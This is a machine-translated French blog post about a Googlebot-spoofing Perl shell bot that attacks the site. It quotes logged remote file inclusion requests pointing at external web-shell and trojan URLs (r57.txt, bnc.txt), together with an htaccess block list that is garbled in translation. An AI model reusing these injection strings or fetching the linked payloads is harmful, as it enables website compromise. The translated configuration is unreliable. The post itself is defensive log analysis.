Pour cela ces trois derniers jours de ce blog est attaque de déni de la souffrance. L'attaque est encore en vie, maintenant, je ne pense pas qu'ils vont laisser pour le moment. I cant interdit ce robot directement comme ils ont été l'envoi de forger des paquets (paquet d'usurpation d'identité) que le robot Googlebot http://www.whois-search.com/whois/64.233.166.136. Im toujours à la recherche de la bonne fournisseur de services Internet.
OrgName: Google Inc OrgID: Gogl Adresse: 1600 Parkway Amphithéâtre Ville: Mountain View StateProv: CA Code postal: 94043 Pays: États-Unis
À l'heure actuelle je bloqué à distance tous les flux aléatoire de leur hôte et *. com "perl bot signature", mais le blocage ne sera pas les empêcher de marteler ce site. Je vais envoyer 503 (Service non disponible) sur certains demande donc si vous avez des problème d'accéder à ce site s'il vous plaît vérifier ultérieurement.
Type d'injections
Il est beaucoup uri paramètre dans mon logs (je handicapés logs du serveur - limite des ressources) qui a probablement un grand inventaires des listes de contrôle de CMS vulnérabilités connues. Je ne peux que confirmer que c'est un blackhat seo spams bot comme ils URI de la demande comprennent la typique order.php page.
/ es / wordpress / how-to-wordpress-enlevée-net-en-spam-injection-infectés par micro-ja gger-goro-class-mailphp/order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / es / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt?
Pour consulter les sources suivantes, vous avez besoin d'exclure l'hébergeur du site à partir de votre logiciel anti-virus.
- Perl / ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP / Cheval de Troie Rst.S - http://hom3.t35.com/xpl/fidz
htaccess mal bloqué Code injecteur et Perl Bot (botnet)
Si vous a des problèmes similaires. vous devez bloquer le domaine suivant dans votre htaccess.
mod_setenvifSetEnvIfNoCase Referer "^ http:// (www.)? T35 \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Emabe \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Pawang \. Dans" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Gw-or \. Net" codeinjector_ref = 1 SetEnvIfNoCase User-Agent "^ libwww-perl *" shell_bots = 1 SetEnvIfNoCase User-Agent "^ Amidalla *" shell_bots = 1 <FilesMatch "(.*)"> Afin de permettre, nier Permettre de tous les Refuser de env = codeinjector_ref Refuser de env = shell_bots </ FilesMatch>
Si U recréer sûr si vous mod_setenvif support du serveur de synthèse comme l'exemple ci-dessous.
<IfModule Mod_setenvif.c> ... # remplacer cette ligne avec le code ci-dessus ... </ IfModule>
Comment piège Perl Shell Bot
Nous avons besoin d'un modèle de ce piège robots. certes, nous savions que ces robots:
- ne respecte pas robot.txt
- d'explorer la totalité de leur sous-répertoire
- ils ont un modèle URI demande
Pour l'instant je ne sous-répertoire pour créer des auto-ban (et d'autres choses) sur la base de leur modèle. Alexa bot seront interdits car ils trop d'honneur dont robot.txt.
Je vais être mise à jour de ce poste de temps en temps. Vérifiez les articles sur la façon de paquet d'usurpation d'identité et la validation de forge / faux paquet.
Récentes de numérisation et de mise à jour
La liste ci-dessous est automatiquement ajouté.
- Décembre 24, 2007
- ip: 64.26.63.10 param: login =,? injecter: http://pawang.in/r57.txt
- Décembre 24, 2007
- ip: 64.26.63.10 param: dir =, = login injecter: http://pawang.in/r57.txt?
- Décembre 25, 2007
- ip: 59.158.128.138 param: p =,: = injecter allinurl: http://gw-gold.net/jpg/pictures/test.txt
Ressources externes
- 21 décembre 2007 à 10:48 pm
- 16 février 2008 à 3:05 am
- 0.3
- url
Pas de réponses à "masse d'injection de code à distance que le robot Googlebot - Spoofing de paquets Perl & Trojan bot"
URL de trackback: Utilisez l'URL TrackBack de ping ↑ cet article. Si votre blog ne supporte pas les trackbacks, vous pouvez laisser un commentaire lieu.
"écrire comme si vous parliez à un ami (en face de votre mère)."
. Donnez votre avis
Avertissement: Pour tout contenu que vous publiez, vous accordez à Kakkoi l'exemption de redevances, irrévocable, perpétuelle, exclusive et entièrement sublicensable d'utiliser, de reproduire, modifier, adapter, publier, traduire, créer des oeuvres dérivées, distribuer, exécuter et afficher un tel contenu, en tout ou en partie, à l'échelle mondiale et de l'incorporer dans d'autres œuvres, sous toute forme, média ou technologie connue ou développée ultérieurement. Certains droits réservés.









Les «Code» sont conçus pour vous protéger, vous et les autres utilisateurs de ce site.
Afin de tenir ces expériences agréables et intéressantes pour tous nos utilisateurs, nous vous demandons de suivre les orientations ci-dessus.
Soyez le premier à commenter.